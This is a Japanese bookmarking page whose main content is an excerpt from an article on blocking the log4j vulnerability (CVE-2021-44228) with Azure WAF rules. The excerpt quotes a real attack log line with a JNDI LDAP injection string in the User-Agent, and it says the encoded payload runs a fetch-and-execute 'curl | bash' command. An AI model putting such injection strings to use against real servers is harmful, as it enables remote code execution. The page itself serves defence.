エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
記事へのコメント1件
- 注目コメント
- 新着コメント
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
Azure WAFでlog4jの脆弱性(CVE-2021-44228)対策をしてみる。
はじめに Azure でのlog4jの脆弱性(CVE-2021-44228)の対策のひとつです。 アップデートするのが良いと... はじめに Azure でのlog4jの脆弱性(CVE-2021-44228)の対策のひとつです。 アップデートするのが良いと思いますが一時しのぎということで Azure WAFでカスタムルールマネージドルールを設定して脆弱性の対策を行います。 (2021/12/16更新) ここではAzure WAFなどサービスの利用方法については記述しません。 セキュリティの専門家ではないのでご了承ください。 今回サーバーのログに残っていたものです。 一部IPなど修正しています。 Base64の中はcurl {IP}|bash してます。つまりコマンド実行しようとしています。 45.153.xxx.xxx - - [10/Dec/2021:21:03:35 +0900] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://9f07e758d269.bingsearxxx
2021/12/13 リンク